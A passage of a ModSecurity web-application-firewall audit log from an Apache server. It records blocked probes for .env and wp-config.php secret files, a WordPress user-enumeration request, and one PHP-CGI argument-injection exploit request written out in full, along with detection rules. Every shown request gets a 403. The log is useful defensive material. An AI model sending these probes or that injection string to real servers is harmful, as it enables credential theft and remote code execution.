1745155316875199 757; combined=310, p1=278, p2=0, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15ea0040-Z-- --671ab07b-A-- [20/Apr/2025:20:35:32 +0700] aAT4JFu16wJWB6g0mU8TgwAAABQ 103.236.140.4 57628 103.236.140.4 8181 --671ab07b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36 Accept-Charset: utf-8 --671ab07b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --671ab07b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745156132216221 783 (- - -) Stopwatch2: 1745156132216221 783; combined=331, p1=295, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --671ab07b-Z-- --93057804-A-- [20/Apr/2025:20:40:00 +0700] aAT5MEAzeWrUIk0gvAswwAAAAMo 103.236.140.4 58668 103.236.140.4 8181 --93057804-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.24.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.24.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.76 Safari/537.36 Accept: */* Accept-Language: en-US,en;q=0.5 --93057804-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93057804-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745156400673119 4510 (- - -) Stopwatch2: 1745156400673119 4510; combined=2177, p1=720, p2=1424, p3=0, p4=0, p5=33, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93057804-Z-- --7906e57e-A-- [20/Apr/2025:20:44:03 +0700] aAT6I1u16wJWB6g0mU8UNgAAAAc 103.236.140.4 60438 103.236.140.4 8181 --7906e57e-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 64.226.78.121 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 64.226.78.121 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --7906e57e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7906e57e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745156643493209 840 (- - -) Stopwatch2: 1745156643493209 840; combined=312, p1=277, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7906e57e-Z-- --7da57112-A-- [20/Apr/2025:21:00:22 +0700] aAT99kAzeWrUIk0gvAsynAAAAMA 103.236.140.4 36666 103.236.140.4 8181 --7da57112-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-A705GM) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --7da57112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7da57112-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745157622877618 731 (- - -) Stopwatch2: 1745157622877618 731; combined=301, p1=265, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7da57112-Z-- --9d57f26a-A-- [20/Apr/2025:21:07:02 +0700] aAT_hkAzeWrUIk0gvAszBQAAAMY 103.236.140.4 38230 103.236.140.4 8181 --9d57f26a-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 209.38.248.17 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 209.38.248.17 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --9d57f26a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d57f26a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745158022417490 876 (- - -) Stopwatch2: 1745158022417490 876; combined=345, p1=295, p2=0, p3=0, p4=0, p5=50, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d57f26a-Z-- --d2bf5f4d-A-- [20/Apr/2025:22:06:22 +0700] aAUNbkAzeWrUIk0gvAs17QAAAMg 103.236.140.4 51878 103.236.140.4 8181 --d2bf5f4d-B-- GET /.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --d2bf5f4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2bf5f4d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745161582487614 886 (- - -) Stopwatch2: 1745161582487614 886; combined=360, p1=324, p2=0, p3=0, p4=0, p5=36, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2bf5f4d-Z-- --4ed7127e-A-- [20/Apr/2025:22:06:24 +0700] aAUNcEAzeWrUIk0gvAs17wAAAM4 103.236.140.4 51888 103.236.140.4 8181 --4ed7127e-B-- GET /api/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --4ed7127e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ed7127e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745161584025889 874 (- - -) Stopwatch2: 1745161584025889 874; combined=339, p1=279, p2=0, p3=0, p4=0, p5=60, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ed7127e-Z-- --319ff07e-A-- [20/Apr/2025:22:06:25 +0700] aAUNcUAzeWrUIk0gvAs18QAAAM0 103.236.140.4 51894 103.236.140.4 8181 --319ff07e-B-- GET /.env.save HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --319ff07e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --319ff07e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745161585510354 787 (- - -) Stopwatch2: 1745161585510354 787; combined=302, p1=267, p2=0, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --319ff07e-Z-- --b457d452-A-- [20/Apr/2025:22:06:27 +0700] aAUNc8TCDeBrh52UaHTIGgAAAIs 103.236.140.4 51900 103.236.140.4 8181 --b457d452-B-- GET /.env.prod HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b457d452-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b457d452-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745161587045481 1002 (- - -) Stopwatch2: 1745161587045481 1002; combined=330, p1=296, p2=0, p3=0, p4=0, p5=34, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b457d452-Z-- --c5446600-A-- [20/Apr/2025:22:06:38 +0700] aAUNflTf0pL9EQC7JDUjbQAAAEA 103.236.140.4 51962 103.236.140.4 8181 --c5446600-B-- GET /dev/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --c5446600-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5446600-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745161598583928 759 (- - -) Stopwatch2: 1745161598583928 759; combined=300, p1=266, p2=0, p3=0, p4=0, p5=34, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5446600-Z-- --87f12f5b-A-- [20/Apr/2025:22:06:39 +0700] aAUNf1Tf0pL9EQC7JDUjbgAAAFQ 103.236.140.4 51968 103.236.140.4 8181 --87f12f5b-B-- GET /application/.env HTTP/1.0 Host: manage.bataranetwork.com X-Real-IP: 170.39.218.52 X-Forwarded-Host: manage.bataranetwork.com X-Forwarded-Server: manage.bataranetwork.com X-Forwarded-For: 170.39.218.52 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --87f12f5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --87f12f5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745161599936861 730 (- - -) Stopwatch2: 1745161599936861 730; combined=288, p1=257, p2=0, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87f12f5b-Z-- --cec26969-A-- [20/Apr/2025:22:18:09 +0700] aAUQMVTf0pL9EQC7JDUkCQAAAE0 103.236.140.4 54634 103.236.140.4 8181 --cec26969-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 165.22.235.3 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 165.22.235.3 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --cec26969-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cec26969-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745162289001344 653 (- - -) Stopwatch2: 1745162289001344 653; combined=239, p1=216, p2=0, p3=0, p4=0, p5=23, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cec26969-Z-- --145c9b21-A-- [20/Apr/2025:22:27:56 +0700] aAUSfFu16wJWB6g0mU8cmwAAABY 103.236.140.4 57492 103.236.140.4 8181 --145c9b21-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --145c9b21-C-- --145c9b21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --145c9b21-E-- --145c9b21-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745162876011773 4525 (- - -) Stopwatch2: 1745162876011773 4525; combined=3029, p1=545, p2=2454, p3=0, p4=0, p5=30, sr=124, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --145c9b21-Z-- --8ee4ea3e-A-- [20/Apr/2025:23:02:08 +0700] aAUagEAzeWrUIk0gvAs5fQAAANg 103.236.140.4 37292 103.236.140.4 8181 --8ee4ea3e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.141 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.145 Safari/537.36 Vivaldi/2.6.1566.49 Accept-Charset: utf-8 --8ee4ea3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ee4ea3e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745164928525785 802 (- - -) Stopwatch2: 1745164928525785 802; combined=341, p1=305, p2=0, p3=0, p4=0, p5=36, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ee4ea3e-Z-- --c430c87e-A-- [20/Apr/2025:23:55:06 +0700] aAUm6lTf0pL9EQC7JDUqeAAAAFA 103.236.140.4 49722 103.236.140.4 8181 --c430c87e-B-- GET /.well-known/pki-validation/wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 52.230.121.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 52.230.121.51 X-Forwarded-Proto: http Connection: close --c430c87e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c430c87e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745168106815164 800 (- - -) Stopwatch2: 1745168106815164 800; combined=267, p1=228, p2=0, p3=0, p4=0, p5=38, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c430c87e-Z-- --69e4fc15-A-- [21/Apr/2025:00:17:44 +0700] aAUsOMTCDeBrh52UaHTO6QAAAJI 103.236.140.4 55588 103.236.140.4 8181 --69e4fc15-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 188.166.108.93 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 188.166.108.93 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --69e4fc15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69e4fc15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745169464654402 1093 (- - -) Stopwatch2: 1745169464654402 1093; combined=457, p1=417, p2=0, p3=0, p4=0, p5=40, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69e4fc15-Z-- --4531b50f-A-- [21/Apr/2025:01:31:48 +0700] aAU9lEAzeWrUIk0gvAtlPAAAANI 103.236.140.4 56458 103.236.140.4 8181 --4531b50f-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 157.245.113.227 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 157.245.113.227 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --4531b50f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4531b50f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745173908161929 864 (- - -) Stopwatch2: 1745173908161929 864; combined=382, p1=348, p2=0, p3=0, p4=0, p5=33, sr=146, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4531b50f-Z-- --1c459339-A-- [21/Apr/2025:02:03:37 +0700] aAVFCcTCDeBrh52UaHQKjAAAAI0 103.236.140.4 41088 103.236.140.4 8181 --1c459339-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.141 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.1 Accept-Charset: utf-8 --1c459339-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c459339-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745175817448557 908 (- - -) Stopwatch2: 1745175817448557 908; combined=368, p1=328, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c459339-Z-- --9d850c09-A-- [21/Apr/2025:03:27:57 +0700] aAVYzUAzeWrUIk0gvAuEmwAAAMk 103.236.140.4 40530 103.236.140.4 8181 --9d850c09-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.49.169 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.49.169 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9d850c09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d850c09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745180877249407 782 (- - -) Stopwatch2: 1745180877249407 782; combined=310, p1=275, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d850c09-Z-- --a45fe228-A-- [21/Apr/2025:03:57:46 +0700] aAVfypjcgo97ICfbW9PdEAAAABY 103.236.140.4 47956 103.236.140.4 8181 --a45fe228-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like 